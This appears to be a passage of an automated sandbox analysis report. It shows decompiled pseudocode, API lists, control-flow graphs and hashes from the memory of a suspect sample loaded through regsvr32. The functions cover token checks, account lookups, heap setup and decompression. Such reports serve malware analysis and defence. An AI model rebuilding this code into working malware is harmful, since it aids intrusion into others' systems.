                                                                                                                                                                                              				short _v28;
                                                                                                                                                                                              				char _v32;
                                                                                                                                                                                              				void* _t20;
                                                                                                                                                                                              				intOrPtr* _t21;
                                                                                                                                                                                              				intOrPtr _t29;
                                                                                                                                                                                              				intOrPtr _t31;
                                                                                                                                                                                              				intOrPtr* _t33;
                                                                                                                                                                                              				intOrPtr _t34;
                                                                                                                                                                                              				char _t37;
                                                                                                                                                                                              				union _TOKEN_INFORMATION_CLASS _t44;
                                                                                                                                                                                              				char _t45;
                                                                                                                                                                                              				intOrPtr* _t48;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t37 = 0;
                                                                                                                                                                                              				_v28 = 0x500;
                                                                                                                                                                                              				_t45 = 0;
                                                                                                                                                                                              				_v32 = 0;
                                                                                                                                                                                              				_t20 = E0499C79E(__ecx);
                                                                                                                                                                                              				_v16 = _t20;
                                                                                                                                                                                              				if(_t20 != 0) {
                                                                                                                                                                                              					_push( &_v24);
                                                                                                                                                                                              					_t44 = 2;
                                                                                                                                                                                              					_t21 = E0499C7F5(_t44); // executed
                                                                                                                                                                                              					_t48 = _t21;
                                                                                                                                                                                              					_v20 = _t48;
                                                                                                                                                                                              					if(_t48 == 0) {
                                                                                                                                                                                              						L10:
                                                                                                                                                                                              						FindCloseChangeNotification(_v16);
                                                                                                                                                                                              						if(_t48 != 0) {
                                                                                                                                                                                              							E04998BF4( &_v20, _t37);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return _t45;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push( &_v12);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push(0x220);
                                                                                                                                                                                              					_push(0x20);
                                                                                                                                                                                              					_push(2);
                                                                                                                                                                                              					_push( &_v32);
                                                                                                                                                                                              					_t29 =  *0x49af820; // 0x4bdfaa0
                                                                                                                                                                                              					if( *((intOrPtr*)(_t29 + 0xc))() == 0) {
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					if( *_t48 <= 0) {
                                                                                                                                                                                              						L9:
                                                                                                                                                                                              						_t31 =  *0x49af820; // 0x4bdfaa0
                                                                                                                                                                                              						 *((intOrPtr*)(_t31 + 0x10))(_v12);
                                                                                                                                                                                              						_t37 = 0;
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t9 = _t48 + 4; // 0x4
                                                                                                                                                                                              					_t33 = _t9;
                                                                                                                                                                                              					_v8 = _t33;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_push(_v12);
                                                                                                                                                                                              						_push( *_t33);
                                                                                                                                                                                              						_t34 =  *0x49af820; // 0x4bdfaa0
                                                                                                                                                                                              						if( *((intOrPtr*)(_t34 + 0x68))() != 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t37 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _v8 + 8;
                                                                                                                                                                                              						_v8 = _t33;
                                                                                                                                                                                              						if(_t37 <  *_t48) {
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L9;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t45 = 1;
                                                                                                                                                                                              					goto L9;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t20;
                                                                                                                                                                                              			}





















                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 0499C79E: GetCurrentThread.KERNEL32 ref: 0499C7B1
                                                                                                                                                                                                • Part of subcall function 0499C79E: OpenThreadToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7B8
                                                                                                                                                                                                • Part of subcall function 0499C79E: GetLastError.KERNEL32(?,?,0499C8E3,00000000,04990000), ref: 0499C7BF
                                                                                                                                                                                                • Part of subcall function 0499C79E: OpenProcessToken.ADVAPI32(00000000,?,?,0499C8E3,00000000,04990000), ref: 0499C7E4
                                                                                                                                                                                                • Part of subcall function 0499C7F5: GetTokenInformation.KERNELBASE(00000000,00000001,00000000,00000000,00000000,00000000,00001644,04990000,00000000,00000000,?,0499C876,00000000,00000000,?,0499C89F), ref: 0499C810
                                                                                                                                                                                                • Part of subcall function 0499C7F5: GetLastError.KERNEL32(?,0499C876,00000000,00000000,?,0499C89F,00001644,?,0499DFCE), ref: 0499C817
                                                                                                                                                                                              • FindCloseChangeNotification.KERNELBASE(?,00001644,00000000,04990000), ref: 0499C96D
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Token$ErrorLastOpenThread$ChangeCloseCurrentFindInformationNotificationProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1806447117-0
                                                                                                                                                                                              • Opcode ID: fcb68a970774d72906d28f896bdb92a0f6335493482b3f10157696af3fbbb8a7
                                                                                                                                                                                              • Instruction ID: 13bfde2d350f8084b488636c3e0da9f51cc6ff18f2b469b458c0a9b24b0624b6
                                                                                                                                                                                              • Opcode Fuzzy Hash: fcb68a970774d72906d28f896bdb92a0f6335493482b3f10157696af3fbbb8a7
                                                                                                                                                                                              • Instruction Fuzzy Hash: AE211872A04209AFDF10EFADDC85AAEBBF8EF48750B144479E511E7251E730AE018B90
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 342 4996298-49962b1 call 4996412 GetOEMCP call 499df3d 347 49962b3-49962b4 342->347 348 49962b6-49962e1 call 49a3bd5 342->348 349 499632b 347->349 352 49962eb-49962f1 call 499d804 348->352 353 49962e3-49962e9 348->353 356 49962f6-49962fd 352->356 354 4996305-4996311 353->354 357 4996323 call 49935a1 354->357 358 4996313-4996318 call 499611b 354->358 359 499631a-4996321 356->359 360 49962ff 356->360 364 4996328-499632a 357->364 358->364 359->357 359->364 360->354 364->349
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04996298(void* __fp0) {
                                                                                                                                                                                              				void* __ecx;
                                                                                                                                                                                              				intOrPtr _t13;
                                                                                                                                                                                              				intOrPtr _t14;
                                                                                                                                                                                              				signed int _t16;
                                                                                                                                                                                              				intOrPtr _t17;
                                                                                                                                                                                              				intOrPtr _t20;
                                                                                                                                                                                              				void* _t25;
                                                                                                                                                                                              				void* _t27;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t32 = __fp0;
                                                                                                                                                                                              				E04996412();
                                                                                                                                                                                              				GetOEMCP();
                                                                                                                                                                                              				_t13 = E0499DF3D(__fp0); // executed
                                                                                                                                                                                              				 *0x49af81c = _t13;
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					 *((intOrPtr*)(_t13 + 0xa0)) = 1;
                                                                                                                                                                                              					_t14 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t2 = _t14 + 0x224; // 0x4990000
                                                                                                                                                                                              					E049A3BD5( *_t2);
                                                                                                                                                                                              					_t26 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              					_t25 = _t27;
                                                                                                                                                                                              					__eflags =  *(_t26 + 0x1898) & 0x00010000;
                                                                                                                                                                                              					if(( *(_t26 + 0x1898) & 0x00010000) == 0) {
                                                                                                                                                                                              						_t7 = _t26 + 0x224; // 0x4990000, executed
                                                                                                                                                                                              						_t26 =  *_t7;
                                                                                                                                                                                              						_t16 = E0499D804( *_t7); // executed
                                                                                                                                                                                              						__eflags = _t16;
                                                                                                                                                                                              						_t17 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              						if(_t16 != 0) {
                                                                                                                                                                                              							__eflags =  *((intOrPtr*)(_t17 + 0x214)) - 3;
                                                                                                                                                                                              							if( *((intOrPtr*)(_t17 + 0x214)) != 3) {
                                                                                                                                                                                              								L10:
                                                                                                                                                                                              								__eflags = 0;
                                                                                                                                                                                              								return 0;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							L9:
                                                                                                                                                                                              							E049935A1();
                                                                                                                                                                                              							goto L10;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						 *((intOrPtr*)(_t17 + 0xa4)) = 1;
                                                                                                                                                                                              						L6:
                                                                                                                                                                                              						_t20 =  *0x49af81c; // 0x4bdfbe8
                                                                                                                                                                                              						__eflags =  *((intOrPtr*)(_t20 + 0x214)) - 3;
                                                                                                                                                                                              						if(__eflags == 0) {
                                                                                                                                                                                              							goto L9;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						E0499611B(_t25, _t26, __eflags, _t32);
                                                                                                                                                                                              						goto L10;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					 *((intOrPtr*)(_t26 + 0xa4)) = 1;
                                                                                                                                                                                              					goto L6;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t13 + 1;
                                                                                                                                                                                              			}












                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetOEMCP.KERNEL32 ref: 0499629D
                                                                                                                                                                                                • Part of subcall function 0499DF3D: GetCurrentProcessId.KERNEL32 ref: 0499DF64
                                                                                                                                                                                                • Part of subcall function 0499DF3D: LookupAccountSidW.ADVAPI32(00000000,?,00000114,00000080,?,?,?), ref: 0499E057
                                                                                                                                                                                                • Part of subcall function 0499DF3D: GetLastError.KERNEL32 ref: 0499E05E
                                                                                                                                                                                                • Part of subcall function 0499DF3D: GetSystemMetrics.USER32(00001000), ref: 0499E06E
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AccountCurrentErrorLastLookupMetricsProcessSystem
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 253334094-0
                                                                                                                                                                                              • Opcode ID: 62a3682606535851b4e90b3e4740efa236fd2671af3ed97d19510906a644e375
                                                                                                                                                                                              • Instruction ID: d868d97bfe452583ef88ab8eb883f513181cf466218e4de4b4f8f5585945166b
                                                                                                                                                                                              • Opcode Fuzzy Hash: 62a3682606535851b4e90b3e4740efa236fd2671af3ed97d19510906a644e375
                                                                                                                                                                                              • Instruction Fuzzy Hash: F2018F31A08202CFDB14EF6CE549AE67BE4EF8A354F098276E445CB015C734AC92DBD2
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 365 499c879-499c892 367 499c894-499c895 365->367 368 499c896-499c8a3 call 499c862 365->368 371 499c8b9-499c8c4 FindCloseChangeNotification 368->371 372 499c8a5-499c8a8 368->372 375 499c8c6-499c8c8 371->375 373 499c8aa-499c8af 372->373 374 499c8b5-499c8b7 372->374 373->374 374->375
                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499C879(void* __ecx) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _t12;
                                                                                                                                                                                              				void* _t13;
                                                                                                                                                                                              				void* _t14;
                                                                                                                                                                                              				void* _t17;
                                                                                                                                                                                              				intOrPtr _t18;
                                                                                                                                                                                              				void* _t23;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v8 = _v8 & 0x00000000;
                                                                                                                                                                                              				_t12 =  *0x49af820; // 0x4bdfaa0
                                                                                                                                                                                              				_t13 =  *((intOrPtr*)(_t12 + 0x70))(__ecx, 8,  &_v8, __ecx);
                                                                                                                                                                                              				if(_t13 != 0) {
                                                                                                                                                                                              					_t14 = E0499C862(); // executed
                                                                                                                                                                                              					_t23 = _t14;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						FindCloseChangeNotification(_v8);
                                                                                                                                                                                              						_t17 = _t23;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						if(_v8 != _t14) {
                                                                                                                                                                                              							_t18 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              							 *((intOrPtr*)(_t18 + 0x30))(_v8);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t17 = 0;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					return _t17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					return _t13;
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}











                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E0499632E() {
                                                                                                                                                                                              				intOrPtr _t3;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t3 =  *0x49af818; // 0x4bdf8b0
                                                                                                                                                                                              				 *((intOrPtr*)(_t3 + 0x2c))( *0x49af83c, 0xffffffff);
                                                                                                                                                                                              				ExitProcess(0);
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000000), ref: 04996345
                                                                                                                                                                                              • API ID: ExitProcess
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 621844428-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04998BDE(long _a4) {
                                                                                                                                                                                              				void* _t2;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t2 = RtlAllocateHeap( *0x49af900, 8, _a4); // executed
                                                                                                                                                                                              				return _t2;
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • RtlAllocateHeap.NTDLL(00000008,?,?,0499959D,00000100,?,04996507), ref: 04998BEC
                                                                                                                                                                                              • API ID: AllocateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1279760036-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 58%
                                                                                                                                                                                              			E0499DA57(void* __ecx) {
                                                                                                                                                                                              				signed int _t4;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t4 = ResumeThread( *(__ecx + 4));
                                                                                                                                                                                              				asm("sbb eax, eax");
                                                                                                                                                                                              				return  ~_t4 & 0x00000001;
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • ResumeThread.KERNELBASE(?,0499D8C2,?,?,00000001), ref: 0499DA5F
                                                                                                                                                                                              • API ID: ResumeThread
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 947044025-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 100%
                                                                                                                                                                                              			E04998BC9() {
                                                                                                                                                                                              				void* _t1;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t1 = HeapCreate(0, 0x96000, 0); // executed
                                                                                                                                                                                              				 *0x49af900 = _t1;
                                                                                                                                                                                              				return _t1;
                                                                                                                                                                                              			}





                                                                                                                                                                                              APIs
                                                                                                                                                                                              • HeapCreate.KERNELBASE(00000000,00096000,00000000,04996502), ref: 04998BD2
                                                                                                                                                                                              • API ID: CreateHeap
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 10892065-0
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 91%
                                                                                                                                                                                              			E0499DA6D(void* __ecx, intOrPtr _a4, signed int _a8) {
                                                                                                                                                                                              				signed int _v8;
                                                                                                                                                                                              				intOrPtr _v12;
                                                                                                                                                                                              				signed int _t26;
                                                                                                                                                                                              				signed int _t28;
                                                                                                                                                                                              				signed int* _t36;
                                                                                                                                                                                              				signed int* _t39;
                                                                                                                                                                                              
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_push(__ecx);
                                                                                                                                                                                              				_t36 = _a8;
                                                                                                                                                                                              				_t28 = _t36[1];
                                                                                                                                                                                              				if(_t28 != 0) {
                                                                                                                                                                                              					_t39 = _t36[2];
                                                                                                                                                                                              					do {
                                                                                                                                                                                              						_a8 = _a8 & 0x00000000;
                                                                                                                                                                                              						if(_t39[2] > 0) {
                                                                                                                                                                                              							_t31 = _t39[3];
                                                                                                                                                                                              							_t22 = _a4 + 0x24;
                                                                                                                                                                                              							_v12 = _a4 + 0x24;
                                                                                                                                                                                              							_v8 = _t39[3];
                                                                                                                                                                                              							while(E0499A0A3(_t22,  *_t31) != 0) {
                                                                                                                                                                                              								_t26 = _a8 + 1;
                                                                                                                                                                                              								_t31 = _v8 + 4;
                                                                                                                                                                                              								_a8 = _t26;
                                                                                                                                                                                              								_t22 = _v12;
                                                                                                                                                                                              								_v8 = _v8 + 4;
                                                                                                                                                                                              								if(_t26 < _t39[2]) {
                                                                                                                                                                                              									continue;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              								}
                                                                                                                                                                                              								goto L8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *_t36 =  *_t36 |  *_t39;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_t39 =  &(_t39[4]);
                                                                                                                                                                                              						_t28 = _t28 - 1;
                                                                                                                                                                                              					} while (_t28 != 0);
                                                                                                                                                                                              				}
                                                                                                                                                                                              				Sleep(0xa);
                                                                                                                                                                                              				return 1;
                                                                                                                                                                                              			}










                                                                                                                                                                                              APIs
                                                                                                                                                                                              • Sleep.KERNELBASE(0000000A), ref: 0499DAD6
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001B.00000002.673715833.0000000004990000.00000040.00001000.00020000.00000000.sdmp, Offset: 04990000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_27_2_4990000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Sleep
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3472027048-0
                                                                                                                                                                                              • Opcode ID: 0946fa263caa7eba7e467d36437ddea1a0d71590a5b3681714ea801011abad7f
                                                                                                                                                                                              • Instruction ID: 7570e079495c26d6bd613f54822ae2a317f38ffbd2211b41225c0163b818fcc4
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0946fa263caa7eba7e467d36437ddea1a0d71590a5b3681714ea801011abad7f
                                                                                                                                                                                              • Instruction Fuzzy Hash: CD111771A05205AFEF14CFA9C5C5AA9B7E8EF88324F148979E85A9B300D375FE50CB40
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 81%
                                                                                                                                                                                              			E049A670F(void* __edi) {
                                                                                                                                                                                              				signed int _t164;
                                                                                                                                                                                              				unsigned int _t172;
                                                                                                                                                                                              				unsigned int _t173;
                                                                                                                                                                                              				signed int _t174;
                                                                                                                                                                                              				signed int _t176;
                                                                                                                                                                                              				signed int _t178;
                                                                                                                                                                                              				signed int _t179;
                                                                                                                                                                                              				signed int _t182;
                                                                                                                                                                                              				signed int _t184;
                                                                                                                                                                                              				unsigned int _t185;
                                                                                                                                                                                              				int _t186;
                                                                                                                                                                                              				int _t194;
                                                                                                                                                                                              				signed char _t200;
                                                                                                                                                                                              				signed int _t207;
                                                                                                                                                                                              				signed int _t208;
                                                                                                                                                                                              				signed int _t209;
                                                                                                                                                                                              				int _t210;
                                                                                                                                                                                              				int _t222;
                                                                                                                                                                                              				signed int _t227;
                                                                                                                                                                                              				signed int _t235;
                                                                                                                                                                                              				signed int _t251;
                                                                                                                                                                                              				signed char _t252;
                                                                                                                                                                                              				unsigned int _t253;
                                                                                                                                                                                              				signed char _t254;
                                                                                                                                                                                              				signed int* _t255;
                                                                                                                                                                                              				signed int _t258;
                                                                                                                                                                                              				signed int _t259;
                                                                                                                                                                                              				signed int _t260;
                                                                                                                                                                                              				signed int _t266;
                                                                                                                                                                                              				intOrPtr _t271;
                                                                                                                                                                                              				signed char _t278;
                                                                                                                                                                                              				signed int _t279;
                                                                                                                                                                                              				char* _t280;
                                                                                                                                                                                              				signed int _t282;
                                                                                                                                                                                              				signed char _t284;
                                                                                                                                                                                              				signed int _t287;
                                                                                                                                                                                              				signed int _t291;
                                                                                                                                                                                              				int _t292;
                                                                                                                                                                                              				int _t293;
                                                                                                                                                                                              				int _t296;
                                                                                                                                                                                              				int _t298;
                                                                                                                                                                                              				int _t302;
                                                                                                                                                                                              				signed int _t305;
                                                                                                                                                                                              				signed char _t311;
                                                                                                                                                                                              				signed char _t312;
                                                                                                                                                                                              				signed char _t315;
                                                                                                                                                                                              				signed char _t316;
                                                                                                                                                                                              				signed int _t318;
                                                                                                                                                                                              				int _t319;
                                                                                                                                                                                              				int _t320;
                                                                                                                                                                                              				signed char _t322;
                                                                                                                                                                                              				int _t324;
                                                                                                                                                                                              				int _t326;
                                                                                                                                                                                              				int _t330;
                                                                                                                                                                                              				signed int _t333;
                                                                                                                                                                                              				signed char _t336;
                                                                                                                                                                                              				signed char _t337;
                                                                                                                                                                                              				signed char _t339;
                                                                                                                                                                                              				int _t341;
                                                                                                                                                                                              				signed int _t347;
                                                                                                                                                                                              				int _t349;
                                                                                                                                                                                              				intOrPtr _t350;
                                                                                                                                                                                              				intOrPtr _t351;
                                                                                                                                                                                              				unsigned int _t356;
                                                                                                                                                                                              				unsigned int _t361;
                                                                                                                                                                                              				signed int _t364;
                                                                                                                                                                                              				signed int _t365;
                                                                                                                                                                                              				intOrPtr _t367;
                                                                                                                                                                                              				void* _t368;
                                                                                                                                                                                              				intOrPtr* _t380;
                                                                                                                                                                                              				void* _t381;
                                                                                                                                                                                              				intOrPtr* _t389;
                                                                                                                                                                                              				void* _t390;
                                                                                                                                                                                              				signed int _t395;
                                                                                                                                                                                              				void* _t396;
                                                                                                                                                                                              				signed int _t397;
                                                                                                                                                                                              				void* _t403;
                                                                                                                                                                                              				void* _t405;
                                                                                                                                                                                              				intOrPtr* _t412;
                                                                                                                                                                                              				void* _t413;
                                                                                                                                                                                              				signed int _t414;
                                                                                                                                                                                              				void* _t416;
                                                                                                                                                                                              				intOrPtr* _t423;
                                                                                                                                                                                              				void* _t424;
                                                                                                                                                                                              				unsigned int _t430;
                                                                                                                                                                                              				signed int _t431;
                                                                                                                                                                                              				void* _t434;
                                                                                                                                                                                              				signed int* _t435;
                                                                                                                                                                                              				void* _t439;
                                                                                                                                                                                              
                                                                                                                                                                                              				 *((intOrPtr*)(__edi + 0x56))();
                                                                                                                                                                                              				asm("pushfd");
                                                                                                                                                                                              				_t435 = _t434 - 0x40;
                                                                                                                                                                                              				asm("cld");
                                                                                                                                                                                              				_t395 = _t435[0x16];
                                                                                                                                                                                              				_t367 =  *((intOrPtr*)(_t395 + 0x1c));
                                                                                                                                                                                              				_t164 =  *_t395;
                                                                                                                                                                                              				_t435[0xb] = _t164;
                                                                                                                                                                                              				_t435[5] =  *((intOrPtr*)(_t395 + 4)) + _t164 - 0xb;
                                                                                                                                                                                              				_t271 =  *((intOrPtr*)(_t395 + 0x10));
                                                                                                                                                                                              				_t251 =  *(_t395 + 0xc);
                                                                                                                                                                                              				_t435[0xf] = _t251;
                                                                                                                                                                                              				_t435[0xa] =  ~(_t435[0x17] - _t271) + _t251;
                                                                                                                                                                                              				_t435[4] = _t271 - 0x101 + _t251;
                                                                                                                                                                                              				_t435[2] =  *(_t367 + 0x4c);
                                                                                                                                                                                              				_t435[3] =  *(_t367 + 0x50);
                                                                                                                                                                                              				 *_t435 = (1 <<  *(_t367 + 0x54)) - 1;
                                                                                                                                                                                              				_t435[1] = (1 <<  *(_t367 + 0x58)) - 1;
                                                                                                                                                                                              				_t172 =  *(_t367 + 0x28);
                                                                                                                                                                                              				_t347 =  *(_t367 + 0x34);
                                                                                                                                                                                              				_t435[0xd] = _t172;
                                                                                                                                                                                              				_t435[0xc] =  *(_t367 + 0x30);
                                                                                                                                                                                              				_t435[0xe] = _t347;
                                                                                                                                                                                              				_t430 =  *(_t367 + 0x38);
                                                                                                                                                                                              				_t252 =  *(_t367 + 0x3c);
                                                                                                                                                                                              				_t396 = _t435[0xb];
                                                                                                                                                                                              				_t278 = _t435[5];
                                                                                                                                                                                              				if(_t278 > _t396) {
                                                                                                                                                                                              					L2:
                                                                                                                                                                                              					if((_t396 & 0x00000003) != 0) {
                                                                                                                                                                                              						_t396 = _t396 + 1;
                                                                                                                                                                                              						_t278 = _t252;
                                                                                                                                                                                              						_t252 = _t252 + 8;
                                                                                                                                                                                              						_t172 = 0 << _t278;
                                                                                                                                                                                              						_t430 = _t430 | _t172;
                                                                                                                                                                                              						goto L2;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L4;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					_t341 = _t278 + 0xb - _t396;
                                                                                                                                                                                              					_t172 = memset(_t396 + _t341 + _t341, 0, memcpy( &(_t435[7]), _t396, _t341) << 0);
                                                                                                                                                                                              					_t435 =  &(_t435[6]);
                                                                                                                                                                                              					_t278 = 0;
                                                                                                                                                                                              					_t396 =  &(_t435[7]);
                                                                                                                                                                                              					_t435[5] = _t396;
                                                                                                                                                                                              					L4:
                                                                                                                                                                                              					_t368 = _t435[0xf];
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_t439 =  *0x49ae040 - 2;
                                                                                                                                                                                              						if(_t439 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t439 > 0) {
                                                                                                                                                                                              							do {
                                                                                                                                                                                              								if(_t252 <= 0xf) {
                                                                                                                                                                                              									asm("lodsw");
                                                                                                                                                                                              									_t322 = _t252;
                                                                                                                                                                                              									_t252 = _t252 + 0x10;
                                                                                                                                                                                              									_t430 = _t431 | 0 << _t322;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_t173 =  *(_t435[2] + ( *_t435 & _t430) * 4);
                                                                                                                                                                                              								while(1) {
                                                                                                                                                                                              									_t253 = _t252 - _t173;
                                                                                                                                                                                              									_t431 = _t430 >> _t173;
                                                                                                                                                                                              									if(_t173 == 0) {
                                                                                                                                                                                              										asm("stosb");
                                                                                                                                                                                              										goto L22;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t356 = _t173 >> 0x10;
                                                                                                                                                                                              									_t311 = _t173;
                                                                                                                                                                                              									if((_t173 & 0x00000010) == 0) {
                                                                                                                                                                                              										if((_t173 & 0x00000040) != 0) {
                                                                                                                                                                                              											L97:
                                                                                                                                                                                              											if((_t173 & 0x00000020) == 0) {
                                                                                                                                                                                              												_t280 = "invalid literal/length code";
                                                                                                                                                                                              												_t350 = 0x1a;
                                                                                                                                                                                              											} else {
                                                                                                                                                                                              												_t280 = 0;
                                                                                                                                                                                              												_t350 = 0xb;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											L101:
                                                                                                                                                                                              											_t174 = _t435[0x16];
                                                                                                                                                                                              											if(_t280 != 0) {
                                                                                                                                                                                              												 *(_t174 + 0x18) = _t280;
                                                                                                                                                                                              											}
                                                                                                                                                                                              											 *((intOrPtr*)( *((intOrPtr*)(_t174 + 0x1c)))) = _t350;
                                                                                                                                                                                              											goto L104;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t173 =  *(_t435[2] + (((0x00000001 << _t311) - 0x00000001 & _t431) + _t356) * 4);
                                                                                                                                                                                              										continue;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t312 = _t311 & 0x0000000f;
                                                                                                                                                                                              									if(_t312 != 0) {
                                                                                                                                                                                              										if(_t253 < _t312) {
                                                                                                                                                                                              											asm("lodsw");
                                                                                                                                                                                              											_t339 = _t253;
                                                                                                                                                                                              											_t253 = _t253 + 0x10;
                                                                                                                                                                                              											_t431 = _t431 | 0 << _t339;
                                                                                                                                                                                              											_t312 = _t339;
                                                                                                                                                                                              										}
                                                                                                                                                                                              										_t253 = _t253 - _t312;
                                                                                                                                                                                              										_t235 = (0x00000001 << _t312) - 0x00000001 & _t431;
                                                                                                                                                                                              										_t431 = _t431 >> _t312;
                                                                                                                                                                                              										_t356 = _t356 + _t235;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_t435[6] = _t356;
                                                                                                                                                                                              									if(_t253 <= 0xf) {
                                                                                                                                                                                              										asm("lodsw");
                                                                                                                                                                                              										_t337 = _t253;
                                                                                                                                                                                              										_t253 = _t253 + 0x10;
